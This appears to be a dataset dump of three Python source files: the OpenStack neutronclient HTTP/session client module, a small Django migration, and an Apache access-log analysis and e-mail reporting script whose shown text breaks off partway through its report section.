code stringlengths 3 1.05M | repo_name stringlengths 5 104 | path stringlengths 4 251 | language stringclasses 1 value | license stringclasses 15 values | size int64 3 1.05M |
|---|---|---|---|---|---|
# Copyright 2012 OpenStack Foundation.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import logging
import os
import debtcollector.renames
from keystoneauth1 import access
from keystoneauth1 import adapter
from oslo_serialization import jsonutils
from oslo_utils import importutils
import requests
from neutronclient._i18n import _
from neutronclient.common import exceptions
from neutronclient.common import utils
osprofiler_web = importutils.try_import("osprofiler.web")
_logger = logging.getLogger(__name__)
if os.environ.get('NEUTRONCLIENT_DEBUG'):
ch = logging.StreamHandler()
_logger.setLevel(logging.DEBUG)
_logger.addHandler(ch)
_requests_log_level = logging.DEBUG
else:
_requests_log_level = logging.WARNING
logging.getLogger("requests").setLevel(_requests_log_level)
MAX_URI_LEN = 8192
USER_AGENT = 'python-neutronclient'
REQ_ID_HEADER = 'X-OpenStack-Request-ID'
class HTTPClient(object):
    """Handles the REST calls and responses, include authn.

    Legacy (non-session) client: it speaks keystone v2-style token
    authentication itself and issues raw ``requests`` calls against the
    Neutron endpoint.
    """

    # All request/response bodies exchanged with Neutron are JSON.
    CONTENT_TYPE = 'application/json'

    @debtcollector.renames.renamed_kwarg(
        'tenant_id', 'project_id', replace=True)
    @debtcollector.renames.renamed_kwarg(
        'tenant_name', 'project_name', replace=True)
    def __init__(self, username=None, user_id=None,
                 project_name=None, project_id=None,
                 password=None, auth_url=None,
                 token=None, region_name=None, timeout=None,
                 endpoint_url=None, insecure=False,
                 endpoint_type='publicURL',
                 auth_strategy='keystone', ca_cert=None, cert=None,
                 log_credentials=False, service_type='network',
                 global_request_id=None, **kwargs):
        self.username = username
        self.user_id = user_id
        self.project_name = project_name
        self.project_id = project_id
        self.password = password
        # Strip a trailing slash so URL concatenation below never
        # produces '//'.
        self.auth_url = auth_url.rstrip('/') if auth_url else None
        self.service_type = service_type
        self.endpoint_type = endpoint_type
        self.region_name = region_name
        self.timeout = timeout
        self.auth_token = token
        self.auth_tenant_id = None
        self.auth_user_id = None
        self.endpoint_url = endpoint_url
        self.auth_strategy = auth_strategy
        self.log_credentials = log_credentials
        self.global_request_id = global_request_id
        self.cert = cert
        if insecure:
            # Disable TLS certificate verification entirely.
            self.verify_cert = False
        else:
            # Verify against the supplied CA bundle, or the system
            # default trust store when none is given.
            self.verify_cert = ca_cert if ca_cert else True

    def _cs_request(self, *args, **kwargs):
        """Issue one request with logging and error translation.

        Wraps :meth:`request`, adding the User-Agent header, request
        logging (with credentials optionally redacted), translation of
        low-level errors into client exceptions, and a 401 check.
        """
        kargs = {}
        kargs.setdefault('headers', kwargs.get('headers', {}))
        kargs['headers']['User-Agent'] = USER_AGENT
        if 'body' in kwargs:
            kargs['body'] = kwargs['body']
        if self.log_credentials:
            log_kargs = kargs
        else:
            # Redact the password before the request is logged.
            log_kargs = self._strip_credentials(kargs)
        utils.http_log_req(_logger, args, log_kargs)
        try:
            resp, body = self.request(*args, **kargs)
        except requests.exceptions.SSLError as e:
            raise exceptions.SslCertificateValidationError(reason=str(e))
        except Exception as e:
            # Wrap the low-level connection error (socket timeout, redirect
            # limit, decompression error, etc) into our custom high-level
            # connection exception (it is excepted in the upper layers of code)
            _logger.debug("throwing ConnectionFailed : %s", e)
            raise exceptions.ConnectionFailed(reason=str(e))
        utils.http_log_resp(_logger, resp, body)
        # log request-id for each api call
        request_id = resp.headers.get('x-openstack-request-id')
        if request_id:
            _logger.debug('%(method)s call to neutron for '
                          '%(url)s used request id '
                          '%(response_request_id)s',
                          {'method': resp.request.method,
                           'url': resp.url,
                           'response_request_id': request_id})
        if resp.status_code == 401:
            raise exceptions.Unauthorized(message=body)
        return resp, body

    def _strip_credentials(self, kwargs):
        """Return a copy of *kwargs* with the password redacted in 'body'."""
        if kwargs.get('body') and self.password:
            log_kwargs = kwargs.copy()
            log_kwargs['body'] = kwargs['body'].replace(self.password,
                                                        'REDACTED')
            return log_kwargs
        else:
            return kwargs

    def authenticate_and_fetch_endpoint_url(self):
        """Ensure we hold a token and know the Neutron endpoint URL."""
        if not self.auth_token:
            self.authenticate()
        elif not self.endpoint_url:
            self.endpoint_url = self._get_endpoint_url()

    def request(self, url, method, body=None, headers=None, **kwargs):
        """Request without authentication."""
        content_type = kwargs.pop('content_type', None) or 'application/json'
        headers = headers or {}
        headers.setdefault('Accept', content_type)
        if body:
            headers.setdefault('Content-Type', content_type)
        if self.global_request_id:
            headers.setdefault(REQ_ID_HEADER, self.global_request_id)
        headers['User-Agent'] = USER_AGENT
        # NOTE(dbelova): osprofiler_web.get_trace_id_headers does not add any
        # headers in case if osprofiler is not initialized.
        if osprofiler_web:
            headers.update(osprofiler_web.get_trace_id_headers())
        resp = requests.request(
            method,
            url,
            data=body,
            headers=headers,
            verify=self.verify_cert,
            cert=self.cert,
            timeout=self.timeout,
            **kwargs)
        return resp, resp.text

    def _check_uri_length(self, action):
        """Raise RequestURITooLong when endpoint + action exceed the cap."""
        uri_len = len(self.endpoint_url) + len(action)
        if uri_len > MAX_URI_LEN:
            raise exceptions.RequestURITooLong(
                excess=uri_len - MAX_URI_LEN)

    def do_request(self, url, method, **kwargs):
        """Authenticated request against the Neutron endpoint.

        Retries exactly once after re-authenticating if the first
        attempt comes back 401 (token may have expired).
        """
        # Ensure client always has correct uri - do not guesstimate anything
        self.authenticate_and_fetch_endpoint_url()
        self._check_uri_length(url)
        # Perform the request once. If we get a 401 back then it
        # might be because the auth token expired, so try to
        # re-authenticate and try again. If it still fails, bail.
        try:
            kwargs['headers'] = kwargs.get('headers') or {}
            if self.auth_token is None:
                self.auth_token = ""
            kwargs['headers']['X-Auth-Token'] = self.auth_token
            resp, body = self._cs_request(self.endpoint_url + url, method,
                                          **kwargs)
            return resp, body
        except exceptions.Unauthorized:
            self.authenticate()
            kwargs['headers'] = kwargs.get('headers') or {}
            kwargs['headers']['X-Auth-Token'] = self.auth_token
            resp, body = self._cs_request(
                self.endpoint_url + url, method, **kwargs)
            return resp, body

    def _extract_service_catalog(self, body):
        """Set the client's service catalog from the response data."""
        self.auth_ref = access.create(body=body)
        self.service_catalog = self.auth_ref.service_catalog
        self.auth_token = self.auth_ref.auth_token
        self.auth_tenant_id = self.auth_ref.tenant_id
        self.auth_user_id = self.auth_ref.user_id
        if not self.endpoint_url:
            self.endpoint_url = self.service_catalog.url_for(
                region_name=self.region_name,
                service_type=self.service_type,
                interface=self.endpoint_type)

    def _authenticate_keystone(self):
        """POST keystone v2 password credentials and store the result."""
        if self.user_id:
            creds = {'userId': self.user_id,
                     'password': self.password}
        else:
            creds = {'username': self.username,
                     'password': self.password}
        if self.project_id:
            body = {'auth': {'passwordCredentials': creds,
                             'tenantId': self.project_id, }, }
        else:
            body = {'auth': {'passwordCredentials': creds,
                             'tenantName': self.project_name, }, }
        if self.auth_url is None:
            raise exceptions.NoAuthURLProvided()
        token_url = self.auth_url + "/tokens"
        resp, resp_body = self._cs_request(token_url, "POST",
                                           body=jsonutils.dumps(body),
                                           content_type="application/json",
                                           allow_redirects=True)
        if resp.status_code != 200:
            raise exceptions.Unauthorized(message=resp_body)
        if resp_body:
            try:
                resp_body = jsonutils.loads(resp_body)
            except ValueError:
                # Non-JSON body: fall through and let access.create deal
                # with the raw text.
                pass
        else:
            resp_body = None
        self._extract_service_catalog(resp_body)

    def _authenticate_noauth(self):
        """'noauth' strategy: only validate that an endpoint was given."""
        if not self.endpoint_url:
            message = _('For "noauth" authentication strategy, the endpoint '
                        'must be specified either in the constructor or '
                        'using --os-url')
            raise exceptions.Unauthorized(message=message)

    def authenticate(self):
        """Dispatch to the configured auth strategy."""
        if self.auth_strategy == 'keystone':
            self._authenticate_keystone()
        elif self.auth_strategy == 'noauth':
            self._authenticate_noauth()
        else:
            err_msg = _('Unknown auth strategy: %s') % self.auth_strategy
            raise exceptions.Unauthorized(message=err_msg)

    def _get_endpoint_url(self):
        """Look up the network endpoint for the current token/region."""
        if self.auth_url is None:
            raise exceptions.NoAuthURLProvided()
        url = self.auth_url + '/tokens/%s/endpoints' % self.auth_token
        try:
            resp, body = self._cs_request(url, "GET")
        except exceptions.Unauthorized:
            # rollback to authenticate() to handle case when neutron client
            # is initialized just before the token is expired
            self.authenticate()
            return self.endpoint_url
        body = jsonutils.loads(body)
        for endpoint in body.get('endpoints', []):
            if (endpoint['type'] == 'network' and
                    endpoint.get('region') == self.region_name):
                if self.endpoint_type not in endpoint:
                    raise exceptions.EndpointTypeNotFound(
                        type_=self.endpoint_type)
                return endpoint[self.endpoint_type]
        raise exceptions.EndpointNotFound()

    def get_auth_info(self):
        """Return the cached token/tenant/user/endpoint as a dict."""
        return {'auth_token': self.auth_token,
                'auth_tenant_id': self.auth_tenant_id,
                'auth_user_id': self.auth_user_id,
                'endpoint_url': self.endpoint_url}

    def get_auth_ref(self):
        """Return the keystoneauth AccessInfo, or None before auth."""
        return getattr(self, 'auth_ref', None)
class SessionClient(adapter.Adapter):
    """Modern client backed by a keystoneauth session/adapter.

    Authentication, endpoint discovery and retries are delegated to the
    session; this class only adapts the request/response shape to what
    the neutronclient code expects (``(resp, resp.text)`` tuples).
    """

    def request(self, *args, **kwargs):
        """Issue a request through the adapter; returns (resp, text)."""
        kwargs.setdefault('authenticated', False)
        kwargs.setdefault('raise_exc', False)
        content_type = kwargs.pop('content_type', None) or 'application/json'
        headers = kwargs.get('headers') or {}
        headers.setdefault('Accept', content_type)
        # NOTE(dbelova): osprofiler_web.get_trace_id_headers does not add any
        # headers in case if osprofiler is not initialized.
        if osprofiler_web:
            headers.update(osprofiler_web.get_trace_id_headers())
        try:
            # Translate the legacy 'body' kwarg into requests' 'data'.
            kwargs.setdefault('data', kwargs.pop('body'))
        except KeyError:
            pass
        if kwargs.get('data'):
            headers.setdefault('Content-Type', content_type)
        kwargs['headers'] = headers
        resp = super(SessionClient, self).request(*args, **kwargs)
        return resp, resp.text

    def _check_uri_length(self, url):
        """Raise RequestURITooLong when endpoint + url exceed the cap."""
        uri_len = len(self.endpoint_url) + len(url)
        if uri_len > MAX_URI_LEN:
            raise exceptions.RequestURITooLong(
                excess=uri_len - MAX_URI_LEN)

    def do_request(self, url, method, **kwargs):
        """Authenticated request against the service endpoint."""
        kwargs.setdefault('authenticated', True)
        self._check_uri_length(url)
        return self.request(url, method, **kwargs)

    @property
    def endpoint_url(self):
        # NOTE(jamielennox): This is used purely by the CLI and should be
        # removed when the CLI gets smarter.
        return self.get_endpoint()

    @property
    def auth_token(self):
        # NOTE(jamielennox): This is used purely by the CLI and should be
        # removed when the CLI gets smarter.
        return self.get_token()

    def authenticate(self):
        # NOTE(jamielennox): This is used purely by the CLI and should be
        # removed when the CLI gets smarter.
        self.get_token()

    def get_auth_info(self):
        """Return token/endpoint info, plus tenant/user ids when the
        auth plugin exposes get_access()."""
        auth_info = {'auth_token': self.auth_token,
                     'endpoint_url': self.endpoint_url}
        # NOTE(jamielennox): This is the best we can do here. It will work
        # with identity plugins which is the primary case but we should
        # deprecate it's usage as much as possible.
        try:
            get_access = (self.auth or self.session.auth).get_access
        except AttributeError:
            # Non-identity plugin: tenant/user ids are unavailable.
            pass
        else:
            auth_ref = get_access(self.session)
            auth_info['auth_tenant_id'] = auth_ref.project_id
            auth_info['auth_user_id'] = auth_ref.user_id
        return auth_info

    def get_auth_ref(self):
        """Return the session's AccessInfo (requires an identity plugin)."""
        return self.session.auth.get_auth_ref(self.session)
# FIXME(bklei): Should refactor this to use kwargs and only
# explicitly list arguments that are not None.
@debtcollector.renames.renamed_kwarg('tenant_id', 'project_id', replace=True)
@debtcollector.renames.renamed_kwarg(
    'tenant_name', 'project_name', replace=True)
def construct_http_client(username=None,
                          user_id=None,
                          project_name=None,
                          project_id=None,
                          password=None,
                          auth_url=None,
                          token=None,
                          region_name=None,
                          timeout=None,
                          endpoint_url=None,
                          insecure=False,
                          endpoint_type='public',
                          log_credentials=None,
                          auth_strategy='keystone',
                          ca_cert=None,
                          cert=None,
                          service_type='network',
                          session=None,
                          global_request_id=None,
                          **kwargs):
    """Build the appropriate client for the supplied credentials.

    When a keystoneauth *session* is given, a :class:`SessionClient` is
    returned and the individual credential arguments are ignored;
    otherwise a legacy :class:`HTTPClient` is assembled from them.
    """
    if session:
        kwargs.setdefault('user_agent', USER_AGENT)
        kwargs.setdefault('interface', endpoint_type)
        return SessionClient(session=session,
                             service_type=service_type,
                             region_name=region_name,
                             global_request_id=global_request_id,
                             **kwargs)
    # FIXME(bklei): username and password are now optional. Need
    # to test that they were provided in this mode. Should also
    # refactor to use kwargs.
    return HTTPClient(username=username,
                      password=password,
                      project_id=project_id,
                      project_name=project_name,
                      user_id=user_id,
                      auth_url=auth_url,
                      token=token,
                      endpoint_url=endpoint_url,
                      insecure=insecure,
                      timeout=timeout,
                      region_name=region_name,
                      endpoint_type=endpoint_type,
                      service_type=service_type,
                      ca_cert=ca_cert,
                      cert=cert,
                      log_credentials=log_credentials,
                      auth_strategy=auth_strategy,
                      global_request_id=global_request_id)
| openstack/python-neutronclient | neutronclient/client.py | Python | apache-2.0 | 16,747 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2017-02-04 13:06
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Drop the obsolete ``active`` boolean from the ``player`` model."""

    dependencies = [
        ('team', '0003_auto_20170128_1404'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='player',
            name='active',
        ),
    ]
| vollov/lotad | team/migrations/0004_remove_player_active.py | Python | mit | 388 |
#!/usr/bin/python
#######################################################################
#
# Analysing Apache log files to get some general insights about the accessablility of a web application
#
# Author: Ahmed ElShafei [elshafei.ah@gmail.com]
#
# NOTE: consider changing the constants in the conf.py file
#
# Description:
# This is a Python script is meant to fetch Apache access log files of an enviroment to get
# an overall staus of web accessability of an online application. It can be run as a cronjob, also, it can be run manually
# by running ./al2r.py .
#
# Change log:
# 08.03.2016 Ahmed ElShafei Script re-created
#
#######################################################################
#Let's Play
##################################################
# Section 00. Importing Python Libraries #
##################################################
import sys
import os
import time
import shutil
import re
import datetime
import collections
import operator
import pprint
import csv
import math
import commands
import smtplib
import getpass
import socket
##################################################
# Section 01. DEFINIONS #
##################################################
# for modularity, configuration is set in seprate file and other helper classes as well, We're going to import it as modules
from conf import *
from ssh import *
from helpers import *
from ua_parser import user_agent_parser
# computing reference time to discard log lines older than that time based on PERIOD value
# PERIOD is e.g. "2 h" / "30m" / "1 d": trailing letter is the unit,
# the rest is the amount.
# NOTE(review): this uses `conf.PERIOD` although only `from conf import *`
# is visible above -- presumably one of the star-imports binds `conf`;
# TODO confirm.
START_DATE = datetime.datetime.now()
period_args = ''.join(conf.PERIOD.split())
period_measure = period_args[-1].lower()
period_val = period_args[0:-1]
if not period_measure in ('h', 'd', 'm'):
    print('\t' + bcolors.FAIL + 'Not valid PERIOD measure unit, please use either m for minutes, h for hours or d for days' + bcolors.ENDC)
    exit(1)
#check if period value is valid
try:
    period_val = int(period_val)
    if period_val < 1 :
        print('\t' + bcolors.FAIL + 'Not valid PERIOD value, please set positive number value ' + bcolors.ENDC)
        exit(1)
except Exception:
    # Non-numeric amount (int() failed).
    print('\t' + bcolors.FAIL + 'Not valid PERIOD value, please set value in numbers' + bcolors.ENDC)
    exit(1)
# dt_ref is the cut-off: log lines older than this are discarded later.
if period_measure == 'h':
    dt_ref = START_DATE - datetime.timedelta(hours=period_val)
elif period_measure == 'm':
    dt_ref = START_DATE - datetime.timedelta(minutes=period_val)
else:
    dt_ref = START_DATE - datetime.timedelta(days=period_val)
#print dt_ref
#print dt_ref
##################################################
# Section 02. INTIALIZATION #
##################################################
print(' * Intializing ....\n')
# Check if the Tempraroy directory exist, otherwise create it
print(' * checking temporary directory ....')
if not os.path.exists(TEMP_DIR):
    print('\t Tempraroy directory not found, creating into ' + TEMP_DIR)
    os.makedirs(TEMP_DIR)
    print('\t .. ' + bcolors.OKGREEN + 'DONE' + bcolors.ENDC + '\n')
else:
    print('\t Tempraroy directory at ' + TEMP_DIR + ' already exists\n')
# check whether log files to be remotely searched or locally
print(' * check whether log files to be remotely searched or locally')
if REMOTE:
    print('\t Files to be searched remotely\n')
    #check if Hosts is SSH accessable
    sshSessions = []  # a list of SSH sessions to be intitiated
    print(' * check if Hosts is accessable normally !')
    for hostname in HOSTNAMES:
        sshSession = SSH(hostname, '', USERNAME, 22)
        sshSessions.append( sshSession )
        # Sanity-check connectivity with a trivial remote echo.
        result = sshSession.cmd('echo Ok')
        if 'Ok' in result:
            print('\t ' + hostname + ' can be accessed successfully')
        else:
            print('\t' + 'Error accessing ' + hostname )
            exit(1)
    print('\n')
else:
    print('\t Files to be searched locally\n')
# getting log files into the temporary directory
if REMOTE:
    print(' * getting log files from remote servers')
    for sshSession in sshSessions:
        #getting the list of files to be copied from the remote log directory
        #generating the placeholder of time frame in oder to be append in find command
        period_placeholder = calculate_period()
        logfiles = sshSession.cmd('find ' + DIRECTORY.replace(" ", "") + '/* ' + period_placeholder + ' | grep ' + COMMON_LOGFILE_NAME)
        logfiles_list = logfiles.split()
        print('\t' + str(len(logfiles_list)) + ' log files found in ' + sshSession.ip + '\n')
        if len(logfiles_list):
            for logfile in logfiles_list:
                # scp each matching file into the local temp directory.
                scp_output = sshSession.pull(logfile, TEMP_DIR)
                if '100%' in scp_output:
                    print('\t' + logfile + ' successfully copied from ' + sshSession.ip + ' to ' + TEMP_DIR + '\n')
                else:
                    print('\t Error coping' + logfile + ' from ' + sshSession.ip + '\n')
                    exit(1)
            print('\t ... DONE')
    print('\n')
else:
    print(' * getting files from local server')
    #calculating second based on PERIOD configuration
    period_placeholder = calculate_period()
    past = time.time() - period_placeholder
    logfiles = []
    for p, ds, fs in os.walk(DIRECTORY):
        for fn in fs:
            filepath = os.path.join(p, fn)
            # Keep files modified inside the window whose name matches.
            if os.path.getmtime(filepath) >= past and COMMON_LOGFILE_NAME in filepath :
                logfiles.append(filepath)
    print ('\t ' + str(len(logfiles)) + ' files found in the local directory ')
    for logfile in logfiles:
        shutil.copy2(logfile, TEMP_DIR)
        print ('\t' + logfile + ' copied to ' + TEMP_DIR)
    print('\n')
#loading IP Gelolaction DB
# Each row is assumed to be (range_start, range_end, country_code,
# country_name) with numeric IP bounds -- TODO confirm against the CSV.
ip_geo_db_f = open(IP_COUNTRY_DB)
csvReader = csv.reader(ip_geo_db_f)
ip_geo_db_data = list(csvReader)
#print(ip_geo_db_data[0])
#print(ip_geo_db_data[0])
##################################################
# Section 03. Reading logfiles #
##################################################
TOKEN_POS = {} #dictionary of apache access log tokens position in log line based on LOGFORMAT value
LFS = LOGFORMAT.split('\"')
#getting token positions in log lines
# For each token: [index of the quote-delimited segment, index of the
# token inside that segment, or -1 when the token IS the whole segment].
for i,v in TOKEN_DICT.items():
    #print( i )
    TOKEN_POS.update({i : [LFS.index(s) for s in LFS if i in s]})
    if i == LFS[TOKEN_POS[i][0]]:
        TOKEN_POS[i].append(-1)
    else:
        TOKEN_POS[i].append(LFS[TOKEN_POS[i][0]].split().index(i))
    #print( TOKEN_POS[i] )
logs = [] #this list will hold the log lines
print(' * reading log files ..')
#loading log line from log giles
for log_file in os.listdir(TEMP_DIR):
    #print log_file
    log_file_path = os.path.join(TEMP_DIR, log_file)
    if os.path.isfile(log_file_path):
        for line in open(log_file_path, 'r').readlines():
            #print line
            if len(line) > 0:
                # Protect spaces inside [...] (the timestamp) before
                # splitting the line on double quotes.
                LLS = re.sub(r'\[.+?\]', lambda x:x.group().replace(" ","_"), line.rstrip()).split('"')
                line_details = {}
                for i,v in TOKEN_POS.items():
                    if v[1] == -1:
                        line_details.update({TOKEN_DICT[i]: LLS[v[0]]})
                    else:
                        line_details.update({TOKEN_DICT[i]: LLS[v[0]].split()[v[1]]})
                line_details['time_stamp'] = time.strptime(line_details['time_stamp'][1:-1].split('_')[0], '%d/%b/%Y:%H:%M:%S')
                line_details.update({'user_agent_details' : user_agent_parser.Parse(line_details['user_agent']) })
                line_details.update({'log_file': log_file})
                #filter odd log line. ex: 84.3.41.146 - - [03/Feb/2016:12:00:14 +0100] "-" 408 - "-" "-" 7
                if datetime.datetime(*line_details['time_stamp'][0:6]) > dt_ref and not ( line_details['user_agent'] == '-' and line_details['request_line'] == '-' and line_details['response_size'] == '-'):
                    logs.append(line_details)
#pprint.pprint( logs[0] )
#print( len(logs) )
print ('\t ' + str(len(logs)) + ' log lines loaded ..\n')
##################################################
# Section 04. Processing logs #
##################################################
print(' * processing logs ..')
# Single pass over the parsed log lines, updating all the aggregate
# counters declared in conf (status codes, referrers, IPs, URLs,
# response time/size maxima, clients, OSes, HTTP methods).
for log in logs:
    #counting status codes occurrence
    if log['status'] in HTTP_STATUS_CODE_OCCUR.keys():
        HTTP_STATUS_CODE_OCCUR[log['status']] += 1
    #getting most referring URLs
    if log['referer_url'] !='-':
        if log['referer_url'] in MOST_REFERING_URLS.keys():
            MOST_REFERING_URLS[log['referer_url']] += 1
        else:
            MOST_REFERING_URLS.update({log['referer_url'] : 1 })
    #calculating most requested ips
    if log['remote_host'] in MOST_REQUESTING_IPs.keys():
        MOST_REQUESTING_IPs[log['remote_host']] += 1
    else:
        MOST_REQUESTING_IPs.update({ log['remote_host'] : 1 })
    #calculating most requested URLS
    # request_line is "METHOD URL PROTOCOL"; [1] is the URL.
    if log['request_line'].split()[1] in MOST_REQUESTING_URLS.keys():
        MOST_REQUESTING_URLS[log['request_line'].split()[1]] += 1
    else:
        MOST_REQUESTING_URLS.update({ log['request_line'].split()[1] : 1 })
    # getting longest response size and Time taken to server the URL
    if log['request_line'].split()[1] in LONGEST_URL_RESPONSE_TIME.keys():
        if int(log['response_time']) > LONGEST_URL_RESPONSE_TIME[log['request_line'].split()[1]]:
            LONGEST_URL_RESPONSE_TIME[log['request_line'].split()[1]] = int(log['response_time'])
    else:
        LONGEST_URL_RESPONSE_TIME.update({ log['request_line'].split()[1] : int(log['response_time']) })
    # getting largest response size ('-' means no body was sent)
    if log['response_size'] != '-':
        if log['request_line'].split()[1] in LARGEST_URL_RESPONSE_SIZE.keys():
            if int(log['response_size']) > LARGEST_URL_RESPONSE_SIZE[log['request_line'].split()[1]]:
                LARGEST_URL_RESPONSE_SIZE[log['request_line'].split()[1]] = int(log['response_size'])
        else:
            LARGEST_URL_RESPONSE_SIZE.update({ log['request_line'].split()[1] : int(log['response_size']) })
    #getting Most reuesting Clients
    # Fall back to the raw user-agent product token when the UA parser
    # could not classify the client.
    if log['user_agent_details']['user_agent']['family'] != 'Other':
        if log['user_agent_details']['user_agent']['family'] in MOST_REQUESTING_CLIENTS.keys():
            MOST_REQUESTING_CLIENTS[log['user_agent_details']['user_agent']['family']] += 1
        else:
            MOST_REQUESTING_CLIENTS.update({ log['user_agent_details']['user_agent']['family'] : 1 })
    else:
        if log['user_agent_details']['string'].split()[0].split('/')[0] in MOST_REQUESTING_CLIENTS.keys():
            MOST_REQUESTING_CLIENTS[log['user_agent_details']['string'].split()[0].split('/')[0]] += 1
        else:
            MOST_REQUESTING_CLIENTS.update({ log['user_agent_details']['string'].split()[0].split('/')[0] : 1})
    #getting Most reuesting OS
    if log['user_agent_details']['os']['family'] != 'Other':
        if log['user_agent_details']['os']['family'] in MOST_REQUESTING_OS.keys():
            MOST_REQUESTING_OS[log['user_agent_details']['os']['family']] += 1
        else:
            MOST_REQUESTING_OS.update({ log['user_agent_details']['os']['family'] : 1 })
    else:
        # Heuristic fallback: second UA token (parenthesised platform).
        if len(log['user_agent_details']['string'].split()) > 2:
            log_ua_os = log['user_agent_details']['string'].split()[1][1:-1]
            if log_ua_os in MOST_REQUESTING_OS.keys():
                MOST_REQUESTING_OS[log_ua_os] += 1
            else:
                MOST_REQUESTING_OS.update({ log_ua_os : 1})
    #count HTTP methods
    log_method = log['request_line'].split()[0]
    if log_method in HTTP_METHODS_COUNT.keys():
        HTTP_METHODS_COUNT[log_method] += 1
# Aggregate per-country request counts from the per-IP counts by
# looking each address up in the (range_start, range_end, code, name)
# geolocation table loaded above.
for ip_addr, hits in MOST_REQUESTING_IPs.items():
    octets = ip_addr.split('.')
    # Pack the dotted quad into a single 32-bit integer for range tests.
    ip_number = (int(octets[0]) * 16777216 + int(octets[1]) * 65536 +
                 int(octets[2]) * 256 + int(octets[3]))
    # BUG FIX: the original never initialized country_val, so an IP that
    # matched no range either raised NameError (first iteration) or was
    # silently credited to the previous IP's country.
    country_val = 'Unknown'
    for ip_range in ip_geo_db_data:
        if int(ip_range[0]) <= ip_number <= int(ip_range[1]):
            if ip_range[3] == '-':
                country_val = 'Private (VPN)'
            else:  # BUG FIX: the original 'else' was missing its colon
                country_val = ip_range[3] + ' (' + ip_range[2] + ')'
            break
    if country_val in TOP_REQUESTING_COUNTERIES:
        TOP_REQUESTING_COUNTERIES[country_val] += hits
    else:
        TOP_REQUESTING_COUNTERIES[country_val] = hits
print('\t Peocessing done, formatting for printing ..\n\n')
##################################################
#        Section 05. Report formatting           #
##################################################
#
#test
#
# When e-mailing is enabled, accumulate one HTML <tr> string per report
# section and substitute the header placeholders in the template now.
if SEND_EMAIL:
    __HTTP_STATUS_CODES_ROWS = ''
    __HTTP_REQUEST_TYPES_ROWS = ''
    __TOP_REQUESTING_IPS_ROWS = ''
    __TOP_REQUESTING_CLIENTS_ROWS = ''
    __TOP_REQUESTING_OSS_ROWS = ''
    __TOP_REQUESTING_COUNTRIES_ROWS = ''
    __TOP_REQUESTED_URLS_ROWS = ''
    __TOP_REFERER_ULS_ROWS = ''
    __LONGEST_RESPONSE_TIME_URLS_ROWS = ''
    __LARGEST_RESPONSE_SIZE_URLS_ROWS = ''
    EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__ENVIRONMENT', ENVIRONMENT)
    EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__PERIOD_FRAME', PERIOD )
    EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__START_DATE', START_DATE.strftime("%Y-%m-%d %H:%M:%S"))
    EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__FROM_EMAIL', getpass.getuser() + '@' + socket.gethostname())
    EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__TO_EMAILS', ', '.join(TO_EMAILS) )
    EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__SUBJECT', ENVIRONMENT + ' | a2lr ')
# --- Report printing -------------------------------------------------
# The original repeated the same 9-line HTML <tr> template inline in all
# ten sections; it is factored into _html_row() (output is byte-identical).
_TD = '<td style="background-color: #A1C6DF; color: black;min-width:50px;padding:5px">\n'


def _html_row(left, right):
    """Render one two-cell HTML table row, identical to the old inline
    template: <tr> / styled <td>left</td> / styled <td>right</td> / </tr>."""
    return ('<tr>\n' + _TD + left + ' </td>\n' + _TD + right +
            ' </td>\n</tr>\n')


# printing http status codes (typo fix: was 'HHTP')
print(bcolors.HEADER + 'HTTP Status codes' + bcolors.ENDC)
for i, v in sorted(HTTP_STATUS_CODE_OCCUR.items(), key=operator.itemgetter(0)):
    if v > 0:
        print( ' ' + i + ' : ' + str(v) )
        if SEND_EMAIL:
            __HTTP_STATUS_CODES_ROWS += _html_row(i, str(v))
print('\n')

# printing http methods (typo fix: was 'HHTP')
print(bcolors.HEADER + 'HTTP Methods' + bcolors.ENDC)
for i, v in HTTP_METHODS_COUNT.items():
    if v > 0:
        print( ' ' + i + ' : ' + str(v) )
        if SEND_EMAIL:
            __HTTP_REQUEST_TYPES_ROWS += _html_row(i, str(v))
print('\n')

# most requesting ips (top 10 by count)
print(bcolors.HEADER + 'Most Requesting IPs' + bcolors.ENDC)
for i, v in sorted(MOST_REQUESTING_IPs.items(), key=operator.itemgetter(1), reverse=True)[:10]:
    print( ' ' + i + ' : ' + str(v) + ' times' )
    if SEND_EMAIL:
        __TOP_REQUESTING_IPS_ROWS += _html_row(i, str(v))
print('\n')

# printing most requesting clients ('-' means no user agent was logged)
print(bcolors.HEADER + 'Most requesting clients' + bcolors.ENDC)
for i, v in sorted(MOST_REQUESTING_CLIENTS.items(), key=operator.itemgetter(1), reverse=True)[:10]:
    if i != '-':
        print( ' ' + i + ' : ' + str(v) + ' times' )
        if SEND_EMAIL:
            __TOP_REQUESTING_CLIENTS_ROWS += _html_row(i, str(v))
print('\n')

# printing most requesting OSs
print(bcolors.HEADER + 'Most Requesting OSs' + bcolors.ENDC)
for i, v in sorted(MOST_REQUESTING_OS.items(), key=operator.itemgetter(1), reverse=True)[:10]:
    print( ' ' + i + ' : ' + str(v) + ' times' )
    if SEND_EMAIL:
        __TOP_REQUESTING_OSS_ROWS += _html_row(i, str(v))
print('\n')

# printing Top requesting Countries
print(bcolors.HEADER + 'Top requesting Countries' + bcolors.ENDC)
for i, v in sorted(TOP_REQUESTING_COUNTERIES.items(), key=operator.itemgetter(1), reverse=True)[:10]:
    print( ' ' + i + ' : ' + str(v) + ' times' )
    if SEND_EMAIL:
        __TOP_REQUESTING_COUNTRIES_ROWS += _html_row(i, str(v))
print('\n')

# printing most requested URLs
print(bcolors.HEADER + 'Most requesting URLs' + bcolors.ENDC)
for i, v in sorted(MOST_REQUESTING_URLS.items(), key=operator.itemgetter(1), reverse=True)[:10]:
    print( ' ' + i + ' : ' + str(v) + ' times' )
    if SEND_EMAIL:
